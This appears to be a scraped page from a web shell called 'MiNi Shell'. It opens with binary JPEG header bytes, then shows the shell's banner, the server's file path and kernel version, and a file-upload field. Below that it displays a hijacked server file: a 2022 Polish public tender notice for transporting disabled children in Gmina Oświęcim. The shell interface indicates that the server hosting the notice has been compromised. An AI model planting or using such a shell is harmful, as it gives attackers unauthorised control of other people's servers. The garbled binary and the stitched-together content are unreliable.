JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220920/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220920/0035564301-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Wykonanie na rzecz Zamawiającego usługi polegającej na<br/>przewozie dzieci niepełnosprawnych, zamieszkałych na terenie Gminy Oświęcim, na trasie dom – placówka oświatowa – dom<br/>wraz z opieką </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">SAMORZĄDOWE CENTRUM USŁUG WSPÓLNYCH GMINY OŚWIĘCIM</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 070461614</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">edukacyjna 9</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Rajsko</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">32-600</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL21A - Oświęcimski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">33 842 95 60</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">33 842 95 61</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">cuw@cuw.gminaoswiecim.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://cuw.gminaoswiecim.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie na rzecz Zamawiającego usługi polegającej na<br/>przewozie dzieci niepełnosprawnych, zamieszkałych na terenie Gminy Oświęcim, na trasie dom – placówka oświatowa – dom<br/>wraz z opieką </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-81764282-38c4-11ed-8832-4e4740e186ac</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00355643</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-09-20</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00050297/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 Wykonanie na rzecz Zamawiajacego usługi polegającej na przewozie dzieci niepełnosprawnych, zamieszkałych na terenie Gminy Oświęcim, na trasie dom-placówka oświatowa-dom wraz z opieką</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W niniejszym postępowaniu komunikacja Zamawiającego z Wykonawcami odbywa się drogą elektroniczną przy użyciu miniPortalu, który dostępny jest pod adresem https://miniportal.uzp.gov.pl/, ePUAPu dostępnego pod adresem: https://epuap.gov.pl/wps/portal oraz poczty elektronicznej<br/>cuw@cuw.gminaoswiecim.pl. 2. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zam. publ., musi posiadać konto na ePUAP. Posiada dostęp do formularzy: ”Formularz do złożenia, zmiany, wycofania oferty lub wniosku oraz do „Formularza do komunikacji”. 3.Na miniPortalu postęp. prowadzone jest pod nazwą: „Wykonanie na rzecz Zamawiającego usługi polegającej na przewozie dzieci niepełnosprawnych, zamieszkałych na terenie Gminy Oświęcim, na trasie dom – placówka oświatowa – dom wraz z<br/>opieką” znak sprawy: CUW.PN.2.2022. 4. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych.., elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w<br/>Regulaminie korzystania z systemu miniPortal (https://miniPortal.uzp.gov.pl/, oraz w Warunkach/ Regulaminie korzystania z elektronicznej platformy usług administr. publiczn. (ePUAP) https://epuap.gov.pl/wps/portal.5. Max rozmiar plików formularzy:<br/>„Formularz złożenia, zmiany, wycofania oferty lub wniosku” oraz „Formularza do komunikacji wynosi 150 MB. 6. Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczenia, o którym mowa w art.125 ust.1 pzp lub elektronicznych kopii dokumentów oraz innych informacji, oświadczeń lub dokumentów, przekazywanych w postepowaniu, przyjmuje się datę ich przekazania na ePUAP.7. Dane postępowania można wyszukać również na liście wszystkich postępowań klikając opcję „Dla Wykonawców” lub ze stromy głównej z zakładki postępowania na miniPortalu.8. Wykonawca składa ofertę za pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub wniosku” dostęp. Na ePUAP i udostępnionego również na miniPortalu. W formularzu oferty Wykonawca zobowiązany jest podać adres skrzynki ePUAP, na którym prowadzona będzie korespondencja związana z postępowaniem.9.Ofertę należy złożyć w oryginale. 10 Złożenie oferty: 1)Oferta powinna być sporządzona w j.pol., z zachowaniem postaci elektr. w formacie danych pdf, rtf, doc, xls i podpisana kwalifikowanym podpisem elektronicznym; 2)Do złożenia oferty<br/>konieczne jest posiadanie przez osobę upoważnioną do reprezent. Wykonawcy ważnego kwalifikowanego podpisu elektronicznego,<br/>podpisu zaufanego lub podpisu osobistego. 11.Zalecenia Zamawiającego odnośnie kwalifikowanego podpisu elektronicznego:1)dokumenty sporządzone i przesyłane w formacie pdf zaleca się podpisywać kwalifikowanym podpisem elektronicznym w formacie PAdES; 2) dokumenty sporządzone i przesyłane w formacie innym niż pdf (np.: .doc, .xls,) zaleca się<br/>podpisywać kwalifikowanym podpisem elektronicznym w formacie XAdES; 3)do składania kwalifikowanego podpisu elektronicznego zaleca się stosowanie algorytmu SHA-2 (lub wyższego). 12.Wszelkie informacje stanowiące tajemnicę przedsiębiorstwa, które Wykonawca zastrzeże, powinny zostać złożone w osobnym pliku wraz z jednoczesnym zaznaczeniem polecenia „Załącznik stanowiący tajemnicę przedsiębiorstwa” a<br/>następnie wraz z plikami stanowiącymi jawną część skompensowane do jednego pliku archiwum(ZIP).13.Wykonawca może przed upływem terminu do składania ofert zmienić lub wycofać ofertę za pośrednictwem Formularza do złożenia, zmiany, wycofania oferty lub wniosku dostępnego na ePUAP i udostępnionych również na miniPortalu. 14. Zamawiający<br/>dopuszcza następujący format przesyłanych danych: pliki o wielkości do 20 MB w formatach: .pdf, rtf, doc, .xls.15. Ofertę, wraz ze<br/>stanowiącymi jej integralną część załącznikami, składa się pod rygorem nieważności w formie elektronicznej lub postaci elektronicznej za pośrednictwem miniPortalu podpisaną kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym. Patrz SWZ pkt.14.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z treścią pkt 32 SWZ (OCHRONA DANYCH<br/>OSOBOWYCH)</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zgodnie z treścią pkt 32 SWZ (OCHRONA DANYCH<br/>OSOBOWYCH)</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">CUW.PN.2.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 98380,00 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest wykonanie na rzecz Zamawiającego usługi polegającej na przewozie dzieci niepełnosprawnych, zamieszkał. na terenie Gminy Oświęcim, na trasie dom–placówka oświatowa–dom wraz z opieką<br/>podczas przewozu. 1. Szczegółowy opis przedmiotu zamówienia: 2. Przedmiotem zamówienia jest wykonanie na rzecz<br/>Zamawiającego usługi polegającej na przewozie dzieci niepełnospr, zamieszkał. na terenie Gminy Oświęcim, na trasie dom placówka<br/>oświatowa-dom wraz z opieką podczas przewozu do następujących placówek oświat, wg wyznaczonych tras:<br/>1)Trasa I Oświęcim: w okresie od 10.10.2022r. do 23.06.2023r.–160 dni a)Specjalnego Ośrodka Szkolno-Wychowawczego<br/>w Oświęcimiu, ul. Obozowa 40 w zakresie:(4 dzieci)-1 dziecko z miejscowości Broszkowice (pobyt czasowy dziecko z Ukrainy) - 2 dzieci z miejscowości Stawy Monowskie, - 1 dziecko z miejscowości Zaborze. a)Specjalnego Ośrodka Szkolno-Wychowawczego w Oświęcimiu, ul. Obozowa 31 w zakresie: (1 dziecka)-1 dziecko z miejscowości Rajsko 2) Trasa II Piasek: w okresie od 10.10.2022 r. do 31.08.2023r.–191 dni z wyłączeniem miesiąca lipca 2023 .3. Usługa przewozu ma być świadczona środkami transp. sprawnymi techn., ubezp. oraz przystos. techniczne do przewozu dzieci niepełnospr. (w tym<br/>przewozu dzieci na wózkach inwalidzkich). Pojazdy muszą być odpowiednio oznakowane, spełniające wymogi<br/>bezpieczeństwa i Kodeksu drogowego z możliwością posadzenia dziecka niepełnospr. w foteliku samochod. dostosowanym<br/>do wagi i wzrostu dziecka zgodnie z ustawą Prawo o ruchu drogowym . Każdy z pojazdów musi posiadać adnotacje w<br/>dowodzie rejestr, że jest przystos. do przewozu osób niepełnosp. 4.O udzielenie zamów. Publiczn.mogą ubiegać się<br/>Wykonawcy, którzy spełniają warunki dotyczące posiadania kompetencji lub uprawnień do prowadz. określonej działaln.<br/>zawodowej, o ile wynika to z odrębn. przepisów. Wykonawca w tym zakresie musi posiadać uprawnienia – licencję na<br/>wykonyw.krajowego transportu drog. osób zgodnie z Ustawą o transp. drogowym 5. Wykonawca winien posiadać 2 specjal.<br/>foteliki, umożl. przewiez 2 dzieci, poruszających się na wózku inwalidzkim. 6. Wykonawca winien posiadać 2 pojazdy<br/>oraz 1 pojazd zastępczy w razie awarii –w tym min. 2 samoch. przeznaczone do przewozu osób niepełnosprawnych, które<br/>musza być wyposażone w atestowane urządzenie specjalistyczne: w windę z napędem elektr. lub podnośnik lub<br/>teleskopowy najazd lub rozkładaną platformę itp. czyli urządz. Umożliw. zajęcie miejsca osobom porusz. się na wózkach<br/>inwalidz., jak również osprzęt z atestem zapewniając.możliwość uruchom. przewożonych wózków. Urządzenia muszą<br/>posiadać atest. 7.Usługa przewozu obejmuje dowóz 6 dzieci. Liczba ta może ulec zmianie w trakcie roku szkol., ale będzie<br/>dotyczyć tylko dzieci zamieszk. na terenie Gminy Oświęcim w tym:1) 1 dzieciko do Specjalnego Ośrodka Szkolno–<br/>Wychowawczego w Oświęcimiu, ul. Obozowa 31; 2) 4 dzieci do Specjalnego Ośrodka Szkolno- Wychowawczego w<br/>Oświęcimiu, ul. Obozowa 40 (w tym 1 dziecko na wózku inwalidzkim wraz z opiekunem- wymaga specjalistycznego fotelika;3) 1 dziecko do Dziennego Ośrodka Rehabilitacyjno-Edukacyjno - Wychowawczego w Piasku, ul.<br/>Dworcowa 27 (w tym 1 dziecko na wózku inwalidzkim wraz z opiekunem-dziecko wymaga w samochodzie specjalistycznego<br/>fotelika); 6 Liczba przewożon. dzieci ma być zgodna z liczbą miejsc wpisaną do dowodu rejestrac. W celu wykon.<br/>zamówienia Wykon. przed podpis. umowy przedłoży informację o podst. Dyspon. tymi zasobami oraz kserok. dowodów<br/>rejestrac.–Załącznik Nr 6 do projektów. Postan. umowy. 8. Dzieci mają być dowiezione do placówek oświat. zgodnie z<br/>ustalonym planem zajęć i odwiezione po zajęciach do domu w czasookresie nie dłuższym niż wymag. na przejazd pomiędzy<br/>placówką a miejscem zamieszkania dzieci.9. Zamawiający zakłada możliwość zmiany do umowy,gdy wystąpi sytuacja konieczności zorganizowania dowozu dla dodatk. dziecka niepełnospr. Zamieszkał. na terenie Gminy<br/>Oświęcim.dowozu dla dodatk. dziecka niepełnospr. Zamieszkał. na terenie Gminy<br/>Oświęcim. 10. Przewóz dzieci do szkół odbywać się będzie od poniedziałku każdego tygodnia lub od pierwszego dnia<br/>rozpoczynającego tydzień szkolny do piątku każdego tygodnia lub do ostatniego dnia kończącego tydzień szkolny, w dni<br/>nauki szkolnej z wyjątkiem świąt i innych ustawowo wolnych dni od pracy, a także przerw w realizacji zajęć dydaktycznowychowaw.<br/>(ferie zimowe, letnie), a także dowóz w pierwszy dzień rozpoczynający tydzień szkolny, a odwóz w ostatni dzień<br/>kończący tydzień szkolny, gdy dziecko przebywa na internacie z uwzględnieniem dni świątecznych, zgodnie z organizacją<br/>pracy w danej placówce oświatowej z zastrzeżeniem ust. 8. 11. W indywidual. przypadkach w ciągu roku szkolnego<br/>Wykonawca może świadczyć usługę przewozu w inny dzień (tj. odpracowanie w sobotę dnia szkolnego).12. W przypadku<br/>odpracowania dnia wolnego przez szkoły, szczegóły należy ustalić z rodzicem/ prawnym opiekunem dziecka. 13.<br/>Harmonogram przewozu (dowozu i odwozu) dzieci zostanie dostosowany do podziałów godzin obowiązuj. w danej<br/>placówce oświat.14. Zamawiający zastrzega sobie, że możliwe są zmiany w planach zajęć lekc. i nie ponosi<br/>odpowiedzialności finansowej za dodatkowe kursy. 15. Zamawiający informuje, że liczba dni przewozu do placówek oświat.<br/>w okresie realizacji zamówienia wynosi, dla 5 dzieci dojeżdż. do SOSW w Oświęcimiu ok. 160 dni przewozu, dla 1 dziecka<br/>dojeżdż. do Dziennego Ośrodka Rehabilitacyjno-Edukacyjno-Wychowawczego w Piasku ok. 191 dni przewozu.16. W przypadku<br/>czasowego zawieszenia zajęć w roku szkolnym 2022/2023 placówek oświatowych z powodu np. trwającej epidemii COVID,<br/>zamówienie w tym okresie nie będzie realizowane. Zamówienie będzie realizowane tylko w dniach nauki szkolnej tj. w<br/>dniach, w których zajęcia szkolne odbywają się na terenie placówki oświatowej (nie dotyczy to dni, kiedy w placówkach<br/>oświatowych są zawieszone czasowo zajęcia i nauka realizowana jest zdalnie). 17. Zamawiający zastrzega, iż podane<br/>liczby dni przewozu, o których mowa w ust. 15 są wielkościami orientacyjnymi i mogą ulec zmniejszeniu. Z tego tytułu<br/>Wykonawcy nie będą przysługiwać żadne roszczenia, w tym roszczenia finansowe. 18. Wykonawca otrzyma wynagrodzenie<br/>wyłącznie za przewozy zrealizowane.19. Zamawiający zastrzega możliwość zmiany liczby dzieci, godzin dowozu i odwozu.<br/>20. Wykonawca ponosi pełną odpowiedzialność za bezpieczeństwo przewoż. dzieci. 21. Wykonawca ponosi odpowiedział. i<br/>wszelkie koszty z tytułu strat material. oraz następstw nieszczęśliwych wypadków powstałych w związku z realizacją<br/>przedmiotu zamówienia.22. Wykonawca winien posiadać opłaconą polisę ubezpieczeń OC i NW (kierowcy, opiekunów i<br/>pasażerów) potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej<br/>działalności związanej z przedmiotem zamówienia na cały okres realizacji zamówienia - patrz 4 SWZ. Miejsce realizacji:<br/>teren powiatu oświęcimskiego, pszczyńskiego . </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60100000-9 - Usługi w zakresie transportu drogowego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-10-10 do 2023-08-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Cena 60%, Czas reakcji na podstawienie pojazdu zastępczego (awaria) 40%. Punkty przyznawane za<br/>podane kryteria będą liczone według następujących wzorów: Kryterium 1: Cena - C Liczba punktów = ( Cmin/Cof ) * 100 * waga<br/>gdzie: 1) Cmin - najniższa cena całości wartości przedmiotu zamówienia spośród wszystkich ofert: 2) Cof cena całości wartości<br/>przedmiotu zamówienia w ofercie badanej. Kryterium 2 - Czas reakcji na podstawienie pojazdu zastępczego (awaria) (CR). Przez<br/>określenie „czas reakcji” Zamawiający rozumie w przypadku wystąpienia awarii pojazdu, maksymalny czas, którym Wykonawca<br/>podstawi pojazd zastępczy na miejsce w/w zdarzenia. Maksymalny czas reakcji wynosi 60 minut od wystąpienia zdarzenia.<br/>Wykonawca w złożonej ofercie może zadeklarować skrócenie maksymalnego czasu na podstawianie pojazdu zastępczego.<br/>Wykonawca, który zaoferuje czas podstawienia pojazdu zastępczego: a) do 45 minut od wystąpienia zdarzenia - otrzyma 40<br/>punktów; b) do 55 minut od wystąpienia zdarzenia - otrzyma 20 punktów; c) do 60 minut od wystąpienia zdarzenia - otrzyma 0<br/>punktów. W przypadku gdy Wykonawca w złożonej ofercie nie wskaże żadnej z wymienionych opcji dot. czasu reakcji, Zamawiający<br/>uzna, że wykonawca zaoferował czas reakcji do 60 minut od wystąpienia zdarzenia i Wykonawca otrzyma 0 punktów. W przypadku<br/>gdy Wykonawca skreśli wszystkie lub tylko jedną w/w opcję, Zamawiający odrzuci taka ofertę (Wykonawca zobowiązany jest<br/>wskazać jeden czas reakcji) . Wykonawca winien określić czas reakcji w sposób mierzalny, tj. w formie cyfrowej (liczba minut).</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas podstawienia pojazdu zastępczego (awaria)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu oraz spełniają warunki udziału w<br/>postępowaniu i wymagania określone w niniejszej SWZ. Zamawiający, na podstawie art. 112 ustawy Pzp określa<br/>następujące warunki udziału. Warunki udziału w postępowaniu: 1. Sytuacja ekonomiczna lub finansowa Zamawiający<br/>wymaga: 1. Wykonawca winien posiadać opłaconą polisę ubezpieczeń OC i NW (odpowiedzialności cywilnej i<br/>ubezpieczenie następstw nieszczęśliwych wypadków kierowcy, opiekunów i pasażerów) potwierdzający, że Wykonawca jest<br/>ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na<br/>cały okres realizacji zamówienia. na wartość min 500 000 zł. 2. Zdolność techniczna lub zawodowa. O udzielenie<br/>zamówienia publicznego mogą ubiegać się Wykonawcy, którzy spełniają warunki, dotyczące zdolności technicznej lub<br/>zawodowej. Zamawiający w zakresie zdolności zawodowej (wiedza i doświadczenie) nie stawia wymagań w zakresie tego<br/>warunku. Zamawiający w zakresie zdolności zawodowej (potencjał techniczny) stawia wymagania w zakresie tego warunku,<br/>tzn. Wykonawca spełni w/w warunek, jeżeli wykaże, że dysponuje 2 samochodami do przewozu osób niepełnosprawnych i<br/>jednym w razie awarii. Razem 3 